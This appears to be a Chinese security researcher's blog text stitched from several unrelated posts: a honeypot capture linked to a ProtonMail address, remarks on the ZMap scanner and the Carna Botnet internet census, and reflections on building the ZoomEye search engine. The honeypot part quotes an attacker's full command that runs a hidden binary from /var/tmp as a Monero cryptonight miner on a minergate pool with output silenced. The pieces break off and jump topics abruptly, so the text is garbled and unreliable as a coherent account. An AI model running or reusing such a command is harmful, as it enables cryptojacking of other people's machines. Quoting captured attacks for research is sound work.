今天凌晨,我们的蜜网系统跳出了个有趣的字符串:
ProtonMail!前段时间我们的分享(推荐安全且匿名的邮箱 ProtonMail)似乎暗示着某种巧合,这不得不引起我们的兴趣。意料之内,匿名是把双刃剑,剑的另一端,“匿名之恶”会让人性丑恶发挥到极致。
以前我说过,黑暗森林法则同样适用于这个网络空间:被发现即被干掉。不好意思,这次是我们“干掉”了对方。
上面这个字符串完整内容是:
(exec /var/tmp/.war/1 -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u [email protected] -p x &> /dev/null &)
ZMap确实是个伟大的工具,但离伟大的社区、伟大的产品还有挺长的路要走。ZMap现在稳定版本是:zmap-2.1.0,下一个大版本是3,作者的野心应该是很大的,但是3能否顺利出来,出来能否得到更好口碑,就真不好说了。
对于ZMap来说,最大的使用成本在于:不是谁都能像ZoomEye/Shodan那样的大工程拥有足够的硬件环境(包括机房环境),一个不小心就是被封。这是ZMap最大的坑,我们称之为天坑,这种天坑无形中也形成了足够的竞争门槛。但是这个天坑除了土豪一把也不是没办法填上,比如有的人就动了那么点洪荒之力,如“Internet Census 2012 ”工程,这个洪荒之力就是“Carna Botnet“。细节(不知道有多少人真的研读了):
http://internetcensus2012.bitbucket.org/paper.html
今年如果再不更新一篇,那就过了。随便说说几句吧,关于“航海图”的。
大概,2013年7月,我们发布ZoomEye这个项目,上线了开放式的网络空间搜索引擎:https://www.zoomeye.org,当时被认为是一种非常天马行空的想法。中文名取名为钟馗之眼,不过这个中文名倒是一直弱化着,包括我在内,大家都喜欢喊ZoomEye这个英文。我一直觉得这是我取名最成功的一次,这个项目我一直牵头至今年上半年结束。
去年我的演讲:发现网络空间里的「暗物质」情报,给我个人带来的感觉是:这个领域如果不深入就太可惜了,多么令人着迷的领域。这对我来说跨度确实很大,以前玩前端Hack,写了不少文章,出了一本书,写了一些小工具及半成品,还有个从未公布的利用平台。但是一旦进入ZoomEye的领域,以前擅长的玩意基本可以废弃,可以延续的只有Hack思维及一些编程经验了。
Paper 在这: https://github.com/evilcos/papers,找「发现网络空间里的“暗物质”情报」。
这个演讲是 ZoomEye Team 的近期结果汇总,当然你不仅可以了解到我们在做什么,还可以知道我们在这个网络空间「汪洋」里的经验。我们得像「海盗」那样做事,才能做好安全研究,因为地下黑客正是如此。
Enjoy :)